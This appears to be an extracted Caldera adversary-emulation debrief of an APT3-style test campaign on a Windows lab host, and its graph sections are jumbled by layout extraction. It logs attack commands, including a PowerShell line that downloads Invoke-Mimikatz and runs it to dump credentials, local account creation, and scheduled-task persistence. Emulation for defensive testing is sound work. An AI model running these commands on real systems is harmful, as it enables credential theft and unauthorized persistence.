Caldera APT3
Caldera APT3
Generated on 2024-04-06T00:00:32Z
This document covers the overall campaign analytics made up of the selected set of operations. The
below sections contain general metadata about the selected operations as well as graphical views of
the operations, the techniques and tactics used, and the facts discovered by the operations. The
following sections include a more in depth review of each specific operation ran.
STATISTICS
An operation's planner makes up the decision making process. It contains logic for how a running
operation should make decisions about which abilities to use and in what order. An objective is a
collection of fact targets, called goals, which can be tied to adversaries. During the course of an
operation, every time the planner is evaluated, the current objective status is evaluated in light of the
current knowledge of the operation, with the operation completing should all goals be met.
AGENTS
The table below displays information about the agents used. An agent's paw is the unique identifier, or
paw print, of an agent. Also included are the username of the user who executed the agent, the
privilege level of the agent process, and the name of the agent executable.
Page 1
OPERATIONS DEBRIEF
server
windows
MSEDGEWIN10$MSEDGEWIN10\IEUser
C2 Server
MSEDGEWIN10$MSEDGEWIN10\IEUser
STEPS GRAPH
This is a graphical display of the agents connected to the command and control (C2), the operations
run, and the steps of each operation as they relate to the agents.
Legend
server
windows
operation
discovery
multiple
C2 Server collection
credential-access
MSEDGEWIN10$MSEDGEWIN10\IEUser
execution
persistence
exfiltration
defense-evasion
command-and-control
MSEDGEWIN10$MSEDGEWIN10\IEUser
initial-access
Windows-Test-APT3
lateral-movement
Page 2
OPERATIONS DEBRIEF
TACTIC GRAPH
This graph displays the order of tactics executed by the operation. A tactic explains the general
purpose or the "why" of a step.
defense-evasion multiple
defense-evasion
command-and-control
defense-evasion discovery
Legend
credential-access
multiple
discovery operation
lateral-movement
multiple
command-and-control discovery
discovery collection
multiple
multiple multiple
exfiltration collection
initial-access
defense-evasion
credential-access credential-access
discovery credential-access
discovery credential-access
multiple exfiltration
credential-access execution
defense-evasion
collection
Windows-Test-APT3 persistence
command-and-control
discovery
initial-access
credential-access
collection
multiple
TECHNIQUE GRAPH
This graph displays the order of techniques executed by the operation. A technique explains the
technical method or the "how" of a step.
Archive Collected Data: Archive via Utility
Scheduled
Command and Scripting Interpreter: Task/Job:
Windows Scheduled
Command Shell Task
Remote System Discovery
Command and Scripting Interpreter: PowerShell
Input Capture:
OS Credential Dumping: LSASS Keylogging
Memory
Signed Binary Proxy Execution: Rundll32
Brute Force: PasswordCommand
Cracking and Scripting Interpreter: Windows
System Information
Command Shell Discovery
Create Account: Local Account
Create or Modify System Process: Windows Service
Non-Application
Obfuscated Files or Information Layer Protocol
Credentials from Password Stores: Credentials from Web Browsers
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
System Network Configuration Discovery
System Network Connections Discovery
Archive Collected Data: Archive via Utility
Unsecured Credentials: Credentials In Files
Data from Local System
System Owner/User Discovery
Account Manipulation
Account Discovery: Local Account
Page 3
OPERATIONS DEBRIEF
FACT GRAPH
This graph displays the facts discovered by the operations run. Facts are attached to the operation
where they were discovered. Facts are also attached to the facts that led to their discovery. For
readability, only the first 15 facts discovered in an operation are included in the graph.
Legend
operation
fact
host.ip.address
3 file.sensitive.extension
host.ip.address
1 server.malicious.url
server.malicious.url file.sensitive.extension 5 host.file.path
host.file.path 13 host.ip.address
host.file.path
Windows-Test-APT3
file.sensitive.extension
host.ip.address host.ip.address
host.file.path
host.file.path
host.ip.address file.sensitive.extension
host.ip.address
host.ip.address
Page 4
OPERATIONS DEBRIEF
Page 5
OPERATIONS DEBRIEF
Page 6
OPERATIONS DEBRIEF
Page 7
OPERATIONS DEBRIEF
2024-04-05 success ttjjvq Create a new net user /add "T1136.001_CMD" "T1136.001_CMD!" No
T16:36:08Z user in a
command
prompt
Page 8
OPERATIONS DEBRIEF
2024-04-05 failure ttjjvq File and dir /s c:\ >> %temp%\T1083Test1.txt && dir /s No
T16:42:07Z Directory "c:\Documents and Settings" >> %temp%\T1083Test1.txt
Discovery && dir /s "c:\Program Files\" >> %temp%\T1083Test1.txt
(cmd.exe) && dir "%systemdrive%\Users\*.*" >>
%temp%\T1083Test1.txt && dir "%userprofile%\AppData\
Roaming\Microsoft\Windows\Recent\*.*" >>
%temp%\T1083Test1.txt && dir
"%userprofile%\Desktop\*.*" >> %temp%\T1083Test1.txt
&& tree /F >> %temp%\T1083Test1.txt
Page 9
OPERATIONS DEBRIEF
Page 10
OPERATIONS DEBRIEF
2024-04-05 success ttjjvq Scheduled schtasks /create /tn "T1053_005_OnLogon" /sc onlogon No
T16:54:33Z Task Startup /tr "cmd.exe /c calc.exe" && schtasks /create /tn
Script "T1053_005_OnStartup" /sc onstart /ru system /tr
"cmd.exe /c calc.exe"
2024-04-05 success ttjjvq System ipconfig /all && netsh interface show interface && arp -a Yes
T16:56:51Z Network && nbtstat -n && net config
Configuration
Discovery on
Windows
2024-04-05 timeout ttjjvq System netstat && net use && net sessions Yes
T16:58:29Z Network
Connections
Discovery
Page 11
OPERATIONS DEBRIEF
Page 12
OPERATIONS DEBRIEF
2024-04-05 failure sbyzsg Create a new net user /add "T1136.001_CMD" "T1136.001_CMD!" No
T23:45:50Z user in a
command
prompt
Page 13
OPERATIONS DEBRIEF
Page 14
OPERATIONS DEBRIEF
host.file.path / \ ## /*** Benjamin DELPY `gentilkiwi` 1 ttjjvq powershell.exe "IEX (New-Object Net.
( [email protected] WebClient).DownloadString('https://ra
w.githubusercontent.com/PowerShellM
afia/PowerSploit/f650520c4b1004daf8
b3ec08007a0b945b91253a/Exfiltration
/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -DumpCreds"
Page 15
OPERATIONS DEBRIEF
host.ip.address 192.229.211.108 1 ttjjvq netstat && net use && net sessions
host.ip.address 192.168.0.193 1 ttjjvq netstat && net use && net sessions
host.ip.address 20.10.31.115 1 ttjjvq netstat && net use && net sessions
Page 16